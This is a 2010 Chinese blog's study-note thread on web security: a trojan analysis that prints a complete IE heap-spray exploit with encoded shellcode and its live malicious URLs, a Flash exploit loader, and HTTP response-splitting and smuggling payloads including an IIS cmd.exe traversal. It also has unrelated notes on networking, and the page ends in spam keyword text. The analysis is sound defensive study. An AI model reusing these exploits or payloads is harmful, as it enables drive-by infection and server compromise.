青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

小默

C 語言樓

RT

posted on 2010-11-10 15:28 小默 閱讀(1863) 評論(14)  編輯 收藏 引用 所屬分類: Language

評論

# XSS(Cross Site Scripting,跨站) 2010-11-10 17:05 小默

適用:動態站點,靜態站點不受其影響。
目的:竊取用戶信息。如竊取Session等。
偽裝:一般將鏈接編碼,避免用戶懷疑它的合法性,騙取用戶點擊。  回復  更多評論   

# re: C 語言樓 2010-11-10 18:18 小默


掃描器掃出來的,不知道怎么用T_T
  
回復  更多評論   

# 一個網馬分析1 2010-11-10 22:13 小默

view-source:http://youth.dlmu.edu.cn/news/rss/news.php?1548.html

查找<script
<script src=http://202.201.48.18/dwtzb/mxd/xd.png?36036000></script>
但是這個東西是嵌在<html></html>中的,不會執行? TODO

不管能不能執行了,先看下是什么吧。
chrome不能查看.png格式的源碼。手動GET:
[green@colorfulgreen ~]$ telnet 202.201.48.18 80
Trying 202.201.48.18...
Connected to 202.201.48.18.
Escape character is '^]'.
GET /dwtzb/mxd/xd.png?26026000 HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 14:08:51 GMT
Server: Apache/2.0.48 (Unix) PHP/5.2.0
Last-Modified: Thu, 26 Aug 2010 17:48:08 GMT
ETag: "12f820-14a-99d9e600"
Accept-Ranges: bytes
Content-Length: 330
Connection: close
Content-Type: image/png
X-Pad: avoid browser bug

document.writeln("<iframe src=http://202.201.48.18/dwtzb/mxd/bie.html width=100 height=0></iframe>");
document.writeln("<iframe src=http://202.201.48.18/dwtzb/mxd/bie6.html width=100 height=0></iframe>");
document.write ('<script language="javascript" type="text/javascript" src="  回復  更多評論   

# 一個網馬分析2 2010-11-10 22:36 小默

看下第一個iframe嵌的頁面
http://202.201.48.18/dwtzb/mxd/bie.html


<div id=sun style='display:none'>MM528384NNXX%u0C0C%u9090%u10EB%u4B5B%uC933%uB966%u047B%u3480%uC20B%uFAE2%u05EB%uEBE8%uFFFF%u2BFF%uC13D%uC2C2%uA69D%uF263%uC2C2%u49C2%uCE82%uB249%u6FDE%uAA49%u49CA%uA835%u9BCD%u5D2A%uC2C1%u52C2%u3A20%uF1AA%uC2F0%uAAC2%uB197%uB0A7%u4996%uCE84%u2D2A%uC2C0%u49C2%uA82A%u9BC3%uBD2A%uC2C1%u20C2%uAA3B%uACAD%uC2C2%uB7AA%uAEB0%u96AF%u8449%u2ACE%uC012%uC2C2%u2A49%uC3A8%u2A9B%uC1A2%uC2C2%u3B20%uAEAA%uF0F1%uAAC2%uAAB1%uAEA7%u4996%uCE84%u732A%uC2C0%u49C2%uA82A%u9BC3%u832A%uC2C1%u20C2%u433B%uC22E%uC2C3%u49C2%u431E%u4201%uC2C2%uA8C2%uA8C2%u91D8%uC2A8%u943D%uF186%u8202%uFE42%uC2C1%u3BB7%u444B%uC252%uC2C2%uC605%u9EC1%uECA3%u05A7%uC186%uBAC6%uC2A7%uF1C2%u930B%u9193%u9395%u02F1%u8449%u2A82%uC09C%uC2C2%u3A41%uCDC2%uBD47%uC2C3%uA8C2%uA8C2%uA8C2%uA8C1%uA8C2%uAAC0%uC2C2%u02C2%u4991%uE684%uFF2A%uC2C0%u41C2%u3D3A%u46CD%uC39C%uC2C2%u844B%uA8A2%u92C2%u943D%u4BEA%uA684%u4449%uC252%uC2C2%uC605%u9EC1%uECA0%u05A7%uC186%uBAC6%uC2A7%uA8C2%uA8C2%uA8C2%uA8C0%uA8C2%uAAC2%uC2C2%u82C2%u4991%uE684%u392A%uC2C3%u41C2%u3D3A%u46CD%uC3DE%uC2C2%u444B%uC246%uC2C2%u5C4B%uC24E%uC2C2%u8449%uA8A2%uA8C2%uA8C2%u49C2%uA284%u3D92%uFA94%u8405%uC2B2%uC2C2%u05C2%uB684%uC2C2%uC2C2%u0543%uC0C2%uC2C2%u19F1%u9C49%uA8A6%u4FC2%uB284%uAA92%uC6C2%uC2C2%u3D95%uA2B4%u943D%uF1C6%u7B0B%uC6C2%uC2C2%uBE42%u3DCD%uB657%u42CE%uCDBE%uC23D%uC7B6%uB642%u3DCD%u2057%u4929%uEF01%uC6C2%uC2C2%u3A41%uBDC2%u4BC1%uB29C%uC2A8%u844F%u92B6%uB43D%u95B2%u743D%uC246%uC2C2%u943D%u43F2%uC229%uC2C6%u41C2%uC239%u67BD%uB43D%u3DA2%uF694%u743D%uC246%uC2C2%u943D%u49F6%u5244%uC2C2%u49C2%u4E5C%uC2C2%u05C2%uC1C6%uA39E%uA7EC%u3D91%uEE94%u7C49%uC24E%uC2C2%u4449%uC252%uC2C2%uC605%u9EC5%uECA0%u43A7%uC22E%uC2C3%u49C2%uAA1E%uC3C2%uC2C2%uAA91%uC3C2%uC2C2%uA895%uA8C2%u3DC2%uDE94%u3949%u02F1%u19F1%u2E43%uC0C2%uC2C2%u0E49%u3A41%uBF96%u4BCA%uC3DE%u0241%u29C6%u4931%u490E%u411B%uD201%u02F1%u9392%u9291%u9292%u9292%u9592%u9292%u8449%u2ACA%uC3C4%uC2C2%uBC49%u2AFE%uC390%uC2C2%uF52A%uC2C2%uAAC2%uB4A1%uC2B5%uB1AA%uA6AA%u96AD%u8449%u2ACE%uC274%uC2C2%u844B%uA6FE%uC663%uC2C2%u4FC2%uA262%u3D3D%uA83D%u3DA7%uFEB4%u8449%u2AD2%uC258%uC2C2%u19F1%u9191%u9191%u123D%uC12A%uC2C3%u43C2%uC22E%uC2C3%u49C2%u413E%uC605%uC505%uB6F0%uCE53%u8505%uA1C6%u134B%u058D%uCA85%uA762%u0955%u8505%u93CE%u7882%u05BD%uD285%uDFFC%uFB74%u8505%u7AD6%u16AB%u05D9%uDA85%uBD7C%u62A4%u8505%u3EDE%uF56B%u056F%uE285%uC85A%u3AD2%u63A6%uC2F2%uC2C2%u8249%u49CE%uDEB2%u496F%uCAAA%u3549%u944B%uA8A6%u9BC6%u032A%uC2C2%u52C2%u3A20%uF1AA%uC2F0%uAAC2%uB197%uB0A7%u4996%u2AC4%uC2D0%uC2C2%u2A49%uC7A8%u2A9B%uC260%uC2C2%u3B20%u3DF1%u3D95%uC694%uFA42%uB62A%u42D0%u2BFA%uCFB6%uFA42%uB629%u3DCA%u2A22%uC2A2%uC2C2%u4301%uC7BA%u5252%u5252%uCAB6%u3D49%u4997%u4F2E%uC782%u223D%u852A%uC2C2%u01C2%uFA42%uB62A%u42D0%u2BFA%uCFB6%uFA42%uB629%u3DCA%u2A22%uC2F2%uC2C2%u4301%uC7BA%u5252%u5252%u1AB6%uCAAA%uC2C8%u4FC2%uC782%u223D%uD52A%uC2C2%u01C2%uD32A%uC2C2%u7AC2%uC3D3%u42C6%uCE00%u29C2%u9AC0%u2A01%u3D3B%u3D3D%u0499%u7AC5%u9D4B%uA4C3%u8505%u3DC7%u0122%u4991%u911E%u82A8%uC2AA%uC2D2%u95C2%u8449%u2AE2%u3DAA%u3D3D%u019A%u9493%uB749%u49FE%uECB6%uC1BA%u9437%uB449%uC1E2%uF137%u8B0B%u6F83%u07C1%u19F1%u7CCD%uF8D2%uB614%u03CA%uC509%u18C1%u2982%uF933%uB7DD%u9C25%u9C49%uC1E6%uA41F%uCE49%u4989%uDE9C%u1FC1%uC649%uC149%u6907%u9B9C%u2A01%u393E%u3D3D%u3070%u3620%uF470%uD1CD%u8A32%uFFB9%uB6F0%uCE53%u1D47%u796D%u4BA1%u8D13%u8293%uBD78%u50C5%uB2E0%u66DC%u2DA6%uF051%u5626%uD14C%u6EC8%uFBBB%u5A24%u4F06%uB6DD%uA495%u3DCF%u7C81%u196E%uC85A%u3AD2%u1442%u586D%u9139%uA4D7%uB6AA%uB2B6%uEDF8%uF0ED%uF0F2%uF0EC%uF3F2%uF6EC%uECFA%uFAF3%uA6ED%uB6B5%uA0B8%uAFED%uA6BA%uAFED%uF3BA%uA7EC%uA7BA%uC2C2%uC2C2YY</div>

<BUTTON ID='EXP' ONCLICK='exp();' STYLE='DISPLAY:NONE'></BUTTON>
<script language="JavaScript">
function code()
{
var div=document.getElementById('sun'); //獲取屬性值
var decode=div.innerHTML; //返回表格行開始和結束標簽之間的所有內容
var x=decode.indexOf('MM');
var y=decode.indexOf('NN');
var xxcode=decode.substring(x+2,y);
return xxcode; //返回MM和NN之間的數據,在這里是528384
}
function sc()
{
var div=document.getElementById('sun');
var decode=div.innerHTML;
var x=decode.indexOf('XX');
var y=decode.indexOf('YY')
var cc=decode.substring(x+2,y);
cc=unescape(cc);
return cc; //返回解密后的XX和YY之間的數據,也就是余下的全部
}

function exp()
{
var d=document.createElement('DIV');
d.addBehavior('#default#userData');
document.appendChild(d);
try{for (i=0;i<10;i++)
{d.setAttribute('s',window);}}
catch(e){}
window.status+='';
}
var memory;
var temptest = decodeURI(',sun,0c0c,sun,0c0c');
var nop=unescape(temptest.replace(/,sun,/g,'%u'));
var SC=sc();
var xcode=code()-SC.length*2;
while(nop.length <= xcode) nop+=nop;
nop=nop.substring(0,xcode - SC.length);
memory=new Array();
for(i=0;i<0x100;i++){memory[i]=nop + SC;}

CollectGarbage();
document.getElementById('EXP').onclick();
</script>

-------------
<div id=sun
下面的一堆代碼是shellcode,解密后有下面exe文件:
http://202.201.48.18/dwtzb/mxd/mx1.exe  回復  更多評論   

# innerHTML 2010-11-11 10:34 小默

innerHTML返回開始和結束標簽之間的所有內容
以下例子,alert框彈出<th>FirstName</th><th>Lastname</th>
<html>
<head>
<script type="text/javascript">
function getInnerHTML(){
alert(document.getElementById("tr1").innerHTML);
}
</script>
</head>
<body>
<table border="1">
<tr id="tr1"><th>FirstName</th><th>Lastname</th></tr>
<tr id="tr2"><td>Peter</td><td>Griffin</td></tr>
</table>
<input type="botton" onclick="getInnerHTML()" value="Alert innerHTML of table row">
</body>
</html>
  回復  更多評論   

# addBehavior Method 2010-11-11 10:58 小默

addBehavior使不需要使用CSS就能指定對象的行為。只針對IE。
偷懶了,直接用msdn上的一個例子。
光標移到LI標簽的元素上,該元素就顯示紅色。
http://samples.msdn.microsoft.com/workshop/samples/components/htc/refs/addBehavior.htm
  回復  更多評論   

# 擴展名 執行 注冊表 2010-11-11 17:26 小默

HKEY_CLASSES_ROOT\.ini
默認值是inifile
有些病毒會把inifile改成exefile,導致.ini結尾的文件可以按exe執行  回復  更多評論   

# 一個迷惑人的flash網馬 2010-11-11 18:37 小默

http://bbs.ikaka.com/showtopic-8629683-1.aspx
by 軒轅小蔥大牛
=======
下面是一個js腳本中的一段代碼:
try{var l;
//嘗試創建新的SWF9的ActiveX對象,并獲得對象中$version屬性的值,將其保存到變量Flashver中。
Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version");}
//使用變量l捕獲錯誤
catch(l){};
finally{if(l!="[object Error]"){ //當不出現[object Error]錯誤,說明系統存在這個ActiveX控件并可用
if(Flashver.indexOf("9,0,16,")>0||Flashver.indexOf("9,0,28,")>0||Flashver.indexOf("9,0,45,")>0||Flashver.indexOf("9,0,47,")>0||Flashver.indexOf("9,0,64,")>0||Flashver.indexOf("9,0,115,")>0){ //檢查Flachver中是否包含特定的版本號字樣,如果是,說明漏洞存在
//在漏洞存在的情況下,使用Flashver變量為參數訪問flash.asp,從而得到真正的惡意代碼內容。
document.write('<iframe style=display:none src="}}

Flashver的值源于對象中的$version屬性,在用于IE組件的SWF9控件中該屬性的值的形式為"win 9,0,x,0",其中x是副版本號,也就是該代碼最關心的依據。
符合條件的版本值如下
win 9,0,16,0
win 9,0,28,0
win 9,0,45,0
win 9,0,47,0
win 9,0,64,0
win 9,0,115,0

以win 9,0,16,0為例,iframe中嵌入的鏈接地址為
http://30mm.azzwg.cn/cb/ff/flash.asp?id=win%209,0,16,0
(Flashver中的空格給escape了)

上面這個鏈接得到的網頁內容:
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">YES</div>
<script type=text/javascript>var so=new SWFObject("GG16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent");</ScripT>

所以真正的畸形swf文件地址是http://30mm.azzwg.cn/cb/ff/GG16.swf

-----
原來的flash網馬分析實踐中,我們經常看到網頁中加載的.swf文件是ie.swf或ff.swf
其實這兩個文件并不是觸發漏洞的畸形swf文件,其功能只是獲取SWF控件版本并連接到真正的畸形swf文件。
其使用的方法,正是在swf中加入腳本,通過獲取$version屬性,使用 $version+".swf" 的形式生成相應的畸形swf文件地址并調用相應函數加載之,從而觸發漏洞。

因此我們再看本帖所提到的腳本代碼,就可以發現,以上這種判斷flash控件版本以加入相應地址的方法,其實只是原來的方法的“外化”。由于現在的代碼直接以javascript的方式表現出來,而不是編譯在swf文件中,所以實際上比原來更簡單更容易判斷了。  回復  更多評論   

# ASCII表 2010-11-12 22:35 小默

Bin Dec Hex 縮寫/字符 解釋
00000000 0 00 NUL(null) 空字符
00000001 1 01 SOH(start of headling) 標題開始
00000010 2 02 STX (start of text) 正文開始
00000011 3 03 ETX (end of text) 正文結束
00000100 4 04 EOT (end of transmission) 傳輸結束
00000101 5 05 ENQ (enquiry) 請求
00000110 6 06 ACK (acknowledge) 收到通知
00000111 7 07 BEL (bell) 響鈴
00001000 8 08 BS (backspace) 退格
00001001 9 09 HT (horizontal tab) 水平制表符
00001010 10 0A LF (NL line feed, new line) 換行鍵
00001011 11 0B VT (vertical tab) 垂直制表符
00001100 12 0C FF (NP form feed, new page) 換頁鍵
00001101 13 0D CR (carriage return) 回車鍵
00001110 14 0E SO (shift out) 不用切換
00001111 15 0F SI (shift in) 啟用切換
00010000 16 10 DLE (data link escape) 數據鏈路轉義
00010001 17 11 DC1 (device control 1) 設備控制1
00010010 18 12 DC2 (device control 2) 設備控制2
00010011 19 13 DC3 (device control 3) 設備控制3
00010100 20 14 DC4 (device control 4) 設備控制4
00010101 21 15 NAK (negative acknowledge) 拒絕接收
00010110 22 16 SYN (synchronous idle) 同步空閑
00010111 23 17 ETB (end of trans. block) 傳輸塊結束
00011000 24 18 CAN (cancel) 取消
00011001 25 19 EM (end of medium) 介質中斷
00011010 26 1A SUB (substitute) 替補
00011011 27 1B ESC (escape) 溢出
00011100 28 1C FS (file separator) 文件分割符
00011101 29 1D GS (group separator) 分組符
00011110 30 1E RS (record separator) 記錄分離符
00011111 31 1F US (unit separator) 單元分隔符
00100000 32 20 (space) 空格
00100001 33 21 !
00100010 34 22 "
00100011 35 23 #
00100100 36 24 $
00100101 37 25 %
00100110 38 26 &
00100111 39 27 '
00101000 40 28 (
00101001 41 29 )
00101010 42 2A *
00101011 43 2B +
00101100 44 2C ,
00101101 45 2D -
00101110 46 2E .
00101111 47 2F /
00110000 48 30 0   回復  更多評論   

# HTTP截斷 HTTP走私 2010-11-13 01:28 小默

http://netsecurity.51cto.com/art/201001/177371.htm
----------

概述

對特定的HTTP報頭的攻擊。

HTTP截斷攻擊
利用缺乏輸入消毒措施的漏洞,允許入侵者向應用程序響應的頭部插入CRL和LF字符,從而將響應分割成兩個不同的HTTP消息。
該攻擊的目標既不同于緩存投毒,也不同于跨站腳本攻擊。 //TODO

HTTP走私攻擊
一些專門精心制作的HTTP消息可能會隨著接收它們的代理的不同,而作不同的解析和解釋。
要求對HTTP消息的各種代理相當熟悉,否則無法發動這種攻擊。

------
HTTP截斷攻擊黑盒測試

一些web應用程序會使用部分用戶輸入來生成它們的響應頭部的某些值。如重定向,目標url依賴于用戶提交的某些值。
舉例來說,假如用戶被要求在標準web接口和高級web接口之間做出選擇,然后,選擇的結果將作為一個參數傳遞,并且這個參數將用于觸發重定向到相應的頁面的應答頭中。也就是,用選擇用參數來標識,參數用于頁面應答頭中,用來觸發重定向。
如果該參數的interface的值是advanced,那么應用程序將響應下列內容:


HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2009 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced">http://victim.com/main.jsp?interface=advanced


//TODO 什么意思?

收到這個消息后,瀏覽器把用戶引向Location頭部指定的頁面。
如果應用程序不過濾用戶輸入,攻擊者在參數interface中插入序列%0d%0a,將能夠觸發一個響應,并且解釋器(如介于用戶和web應用之間的web緩存)會把這個響應解釋成兩個不同的響應。從而攻擊者可以通過給這個web緩存“投毒”使它為后續的請求提供虛假內容。

假設攻擊者使用以下內容作為參數interface進行傳遞:

advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length%2035%0d%0aSorry,%20System%20Down

即:
advanced
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

Sorry, System Down

沒有對用戶輸入進行嚴格消毒的應用程序中得到的響應將是下面的內容:

HTTP/1.1 302 Moved Temporarily
Date: Sun, 03 Dec 2009 16:22:19 GMT
Location: http://victim.com/main.jsp?interface=advanced">http://victim.com/main.jsp?interface=advanced
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 35

Sorry, System Down

Web緩存將看到兩個不同的響應。如果攻擊者發送第一個請求后,以及發送另外一個請求,請求/index.html,Web緩存就會認為和第二個響應相匹配,并緩存第二個響應內容。這樣,后面所有指向victim.cm/index.html的請求都會收到system down的消息。

通過這種方式,能夠有效涂改站點在使用Web緩存的用戶心中的形象。
如果這個Web緩存是Web應用程序的一個反向代理的話,這個Web應用程序在整個因特網的用戶都會受到影響。 //TODO.類似于搜狗瀏覽器的上國際網代理?
另外,攻擊者還可以向這些用戶傳輸發動跨站腳本攻擊的js代碼,竊取cookie等。

查找這個漏洞,需要識別能影響一個或多個頭部的用戶輸入,并檢查是否能夠在其中注入一個CR+LF序列。和這個攻擊關機密切的兩個頭部:
Location
Set-Cookie

利用這個漏洞比較復雜,要考慮一些因素:
1.要使偽造的響應被緩存:必須正確設置其中各個頭部,如Last-Modified頭部的值必須設為將來的一個時間;必須破壞目標頁面先前的緩存版本,方法是提交一個請求頭部中帶有"Pragma: no-cache"的前導頁面來防止頁面被緩存。
2.應用程序可能過濾了發動攻擊所需的其它字符,如<>等。可以嘗試使用其他編碼,如UTF-7等。
3.某個攻擊目標(如ASP)會對Location頭部(如www.victim.com/redirect.asp)中的路徑部分進行URL編碼處理,這樣CRLF序列不起作用了。但是它們不能對查詢部分(如?interface=advanced)進行這樣的編碼處理,這意味著放置一個前導問號就能夠繞過這種過濾技術。

-----------
HTTP走私攻擊黑盒測試

利用的漏洞:某些精心構造的HTTP消息會隨不同的代理(瀏覽器、web緩存、應用程序防火墻)而做不同的解釋。

這里只介紹一種:繞過應用程序防火墻。

針對IIS服務器的Unicode目錄遍歷攻擊能夠通過提交下面請求發動攻擊:
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ //TODO
通過檢查url是否存在類似".."和"cmd.exe"可以檢測和過濾掉這種攻擊。
但是IIS 5.0對POST請求主體的的長度限制為48KB。當Content-Type頭部不同于application/x-www-form-urlencode時,查出該限制的部分會被全部截斷。
IIS對請求主體的長度有限制,但Web應用防火墻對請求主體的長度沒有這個限制。

攻擊者可以創建一個很大的請求:
POST /target.asp HTTP/1.1 <-- Request #1
Host: target
Connection: Keep-Alive
Content-Length: 49225

<49152 bytes of garbage>
POST /target.asp HTTP/1.0 <-- Request #2
Connection: Keep-Alive
Content-Length: 33

POST /target.asp HTTP/1.0 <-- Request #3
xxxx: POST /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 <-- Request #4
Connection: Keep-Alive


這里Request #1由49223字節組成,所以Qequest #1還包含了Request #2的幾行內容,防火墻能看到#1但無法看到#2。同樣能看到#3卻無法看到#4(因為該POST正好是偽造的頭部xxxx部分?)。
IIS 5.0將在49152字節(48K)無用信息后停止對Request #1的解析。并將Request #2解析為一個新的、單獨的請求。#2內容為33字節,正好到xxxx:之前的所有內容。IIS 5.0看不到#3,因為#3被解釋成#2的一部分。但是IIS會認出#4。
于是該#4不會被防火墻發現,但能被IIS正確解析和執行。

利用:利用各種支持HTTP的設備在解析不兼容1005 RFC的消息時采用不同方式,來發動攻擊。如:
HTTP協議只允許一個Content-Length頭部,但沒有規定如何處理具有兩個Content-Length頭部的消息。一些將使用第一個,而另一些將使用第二個,這種情況下就容易遭到HTTP走私的攻擊。
另一個例子是GET消息中Content-Length頭部的使用。  回復  更多評論   

# 兩類windows漏洞臨時解決方案 2010-11-13 21:33 小默

允許在受影響的系統上遠程執行代碼,但必須要求用戶交互才能利用這些漏洞。
臨時解決方案:不交互

--

某服務(如DHCP Server)中存在漏洞。
臨時解決方案:不安裝/開啟相關服務;防火墻封堵相關端口(如UDP 67/68)。

  回復  更多評論   

# 配合代理腳本 實現訪問內外網站的自動轉換 2010-11-13 22:20 小默

起因:公司啟動了內部OA(辦公自動化)系統。但不同部門不在一個局域網內。

解決方案1: VPN接入。
方案1缺陷:不同部門用不同ISP接入互聯網,VPN服務器配置不一致。 //TODO VPN配置方法

解決方案2: 使用代理服務器。 //TODO 代理服務器是公司自己架一臺服務器,還是在ISP租一臺?自己架的話放到哪兒?
方案2缺陷:訪問OA時需要在IE中設置代理服務器;訪問互聯網時需要取消代理服務器的設置。每次都需要手動配置很麻煩。
解決辦法:使用代理自動配置腳本(PAC-file: Proxy Auto-Config file)。

PAC腳本:以.PAC為擴展名的Javascript腳本,實際上就是定義一個名為FindProxyForURL的js函數,該函數會被瀏覽器自動調用,從而實現代理服務器的自動轉換。

function findproxyforurl(host, url) //js不區分大小寫
{
if(shexpmatch(host,"*.jifang.com.cn")) //訪問內網OA域名,使用代理
return "proxy 218.xxx.xxx.30:8080"
else if(shexpmatch(host, "172.16.*.*")) //訪問內容某ip地址,使用代理
return "proxy 218.xxx.xxx.30:8080"
else //其它直接連接
return "direct"
}  回復  更多評論   

# Cisco IOS 初始配置 2010-12-07 09:35 小默

——路由器模式——
Router>enable // 進入特權exec模式
Router#configure terminal // 進入全局配置模式
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)#exit // 退出全局配置模式
Router#disable // 退出特權exec模式

——打開路由器電源后——
1、硬件測試:內存、接口
2、加載IOS鏡像,即路由器操作系統
3、查找并使用配置信息

——虛擬配置注冊表——
  回復  更多評論   

# 插樓 - DNS查詢 首選DNS 備用DNS 2010-12-08 18:55 小默

http://betternextday.spaces.live.com/Blog/cns!91CB16EB3BCAAC7B!395.entry
---------------------------
Windows系統中DNS查詢的原理.首先,Windows操作系統中,對DNS的相應方式是,使用第一個應答.就先來先用.然后我們來分析一下查詢的機制(并不是第一個DNS完全失敗以后才用第二個DNS)
如果只有一塊網卡的情況下:

1. 客戶端向網卡上配置的首選DNS發送查詢請求,并等待1秒.
2. 如果1秒內無響應(哪怕因為網絡延遲未能傳到機器也算),客戶端再次向首選DNS服務器發送查詢請求,等待2秒鐘
3. 如果這2秒鐘內依然沒有相應,客戶端會向所有配置過的DNS服務器同時發出查詢請求(包括首選).并等待2秒鐘您看到的文章來自活動目錄seo http://gnaw0725.blogbus.com/c1404551/

4. 如果這2秒鐘內還是沒有相應. 客戶端會向所有配置過的DNS服務器同時發出查詢請求(包括首選).并等待4秒鐘
5. 如果這4秒鐘內還是沒有相應. 客戶端會向所有配置過的DNS服務器同時發出查詢請求(包括首選).并等待8秒鐘
6. 如果8秒內依然沒有相應的話,客戶端停止查詢,并且在DNS的緩存中做一個Negative的記錄,表示這個名字的DNS不存在.
另外還有多網卡的情況,也有略微的不同.
具體可以參考這篇文章:
DNS Processes and Interactions

http://technet.microsoft.com/en-us/library/dd197552.aspx  回復  更多評論   

導航

統計

留言簿(13)

隨筆分類(287)

隨筆檔案(289)

漏洞

搜索

積分與排名

最新評論

閱讀排行榜

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            一本一本久久a久久精品综合妖精| 欧美午夜精品久久久久免费视| 欧美视频在线观看| 欧美黄色影院| 伊人久久综合| 久久亚洲美女| 男女av一区三区二区色多| 国产揄拍国内精品对白| 久久久噜噜噜久久中文字幕色伊伊| 嫩草成人www欧美| 欧美成人午夜影院| 欧美一区二区在线观看| 韩国一区电影| 欧美日韩一区二区在线视频| 亚洲欧美经典视频| 欧美激情a∨在线视频播放| 亚洲观看高清完整版在线观看| 亚洲一区精彩视频| 久久亚洲精品中文字幕冲田杏梨| 91久久综合| 国产精品久久久久久av福利软件| 久久精视频免费在线久久完整在线看| 亚洲欧洲日本国产| 久久精品国产一区二区三| 狠狠色噜噜狠狠色综合久| 亚洲国产综合在线看不卡| 国产精品免费看片| 免费欧美日韩| 亚洲欧美国产高清| 久久亚洲国产成人| 欧美体内she精视频| 国产亚洲精久久久久久| 欧美日韩亚洲一区三区| 国际精品欧美精品| 日韩一二三区视频| 在线成人免费观看| 国产精品99久久不卡二区| 老司机一区二区三区| 久久久一区二区三区| 久久精品欧洲| 欧美日韩中文精品| 亚洲电影免费观看高清完整版| 国产精品入口| 欧美三级电影大全| 精品不卡一区| 国产亚洲成精品久久| 国产精品高清在线观看| 国产综合色产| 久久福利精品| 午夜亚洲精品| 国产视频一区二区三区在线观看| 蜜臀99久久精品久久久久久软件| 亚洲欧美在线磁力| 亚洲视频免费看| 99精品黄色片免费大全| 亚洲精品国产无天堂网2021| 加勒比av一区二区| 午夜精品www| 亚洲成人在线视频播放 | 欧美丰满高潮xxxx喷水动漫| 亚洲一区二区三区高清| 欧美日韩专区| 亚洲先锋成人| 亚洲欧美激情视频| 久久精品人人做人人爽| 亚洲午夜在线观看| 久久精品国产精品 | 国产日韩欧美精品综合| 午夜国产欧美理论在线播放| 一本久久知道综合久久| 欧美日一区二区在线观看 | 免费中文字幕日韩欧美| 久久国产精品久久久| 国产一区二区三区在线观看免费 | 欧美一区二区三区婷婷月色| 亚洲欧美日韩国产中文| 国产亚洲精品久久久久动| 久久久久国产精品人| 老**午夜毛片一区二区三区| 久久久久国产一区二区| 在线观看欧美激情| 免费国产一区二区| 国产精品久久久久免费a∨| 欧美激情一区二区三区全黄| 欧美色偷偷大香| 午夜精品福利一区二区蜜股av| 亚洲天堂av高清| 国产日韩欧美一区二区三区在线观看| 香蕉成人久久| 欧美国产激情二区三区| 欧美电影免费观看| 国产女主播在线一区二区| 亚洲精品日韩在线观看| 午夜一区二区三视频在线观看| 亚洲一区在线免费观看| 国产专区欧美精品| 亚洲国产日韩欧美在线动漫| 欧美一区二视频| 欧美日韩精品系列| 亚洲国产成人av| 欧美自拍丝袜亚洲| 久久久女女女女999久久| 一区二区激情小说| 欧美激情导航| 国产精品国产三级国产专播品爱网 | 欧美激情在线观看| 欧美亚洲在线视频| 欧美激情性爽国产精品17p| 欧美亚洲一区二区在线| 欧美成人一区二区三区片免费| 欧美一乱一性一交一视频| 欧美a一区二区| 久久九九免费视频| 欧美视频在线播放| 欧美高清不卡在线| 国产美女精品| 久久av一区二区| 欧美高清视频一区二区三区在线观看| 亚洲第一成人在线| 中国成人黄色视屏| 亚洲国产精品电影在线观看| 亚洲欧美在线免费| 在线亚洲欧美| 欧美激情综合五月色丁香| 久久久免费精品| 久久人体大胆视频| 欧美一区二区三区四区在线观看 | 国产精品日韩一区| 日韩亚洲综合在线| 国产精品黄色在线观看| 亚洲国产成人tv| 尤物九九久久国产精品的分类| 亚洲尤物影院| 性xx色xx综合久久久xx| 欧美日韩一区二区三区在线观看免| 欧美激情亚洲一区| 91久久香蕉国产日韩欧美9色| 久久精品中文字幕免费mv| 久久久久www| 国产精品毛片在线看| 在线成人激情黄色| 欧美成在线视频| 激情六月综合| 久久精品夜色噜噜亚洲aⅴ| 久久国产欧美| 国产精品夜夜夜| 亚洲欧美日韩国产一区二区| 欧美在线观看视频一区二区三区 | 亚洲人成欧美中文字幕| 亚洲人成网站777色婷婷| 欧美.www| av成人天堂| 亚洲欧美国产一区二区三区| 国产乱码精品一区二区三区五月婷| 亚洲一级在线观看| 欧美在线视频在线播放完整版免费观看 | 久久精品盗摄| 欧美激情二区三区| 99视频有精品| 在线视频免费在线观看一区二区| 99国产精品视频免费观看| 欧美日韩精品欧美日韩精品| 一区二区三区高清在线观看| 亚洲欧美日韩在线高清直播| 国产精品久久久久久久久久妞妞 | 午夜久久美女| 精品成人免费| 欧美极品影院| 亚洲欧美日韩第一区| 免费在线日韩av| 亚洲在线视频网站| 蜜桃久久精品乱码一区二区| 亚洲国产综合在线| 亚洲欧美视频在线观看| 一区在线播放视频| 欧美视频在线观看一区二区| 亚洲制服av| 亚洲国产精品悠悠久久琪琪| 午夜日韩在线| 亚洲精品国产无天堂网2021| 国产精品海角社区在线观看| 麻豆av一区二区三区| 中日韩美女免费视频网站在线观看| 久久视频这里只有精品| 亚洲一区免费看| 亚洲国产日韩在线一区模特| 国产精品视频网址| 欧美精品在线观看一区二区| 欧美激情一区二区三区在线视频观看| 在线中文字幕不卡| 韩国自拍一区| 国产精品蜜臀在线观看| 欧美成人综合在线| 午夜精品成人在线| 亚洲免费精品| 亚洲福利视频免费观看| 久久久久国色av免费看影院| 亚洲愉拍自拍另类高清精品| 亚洲精品美女在线| 曰本成人黄色|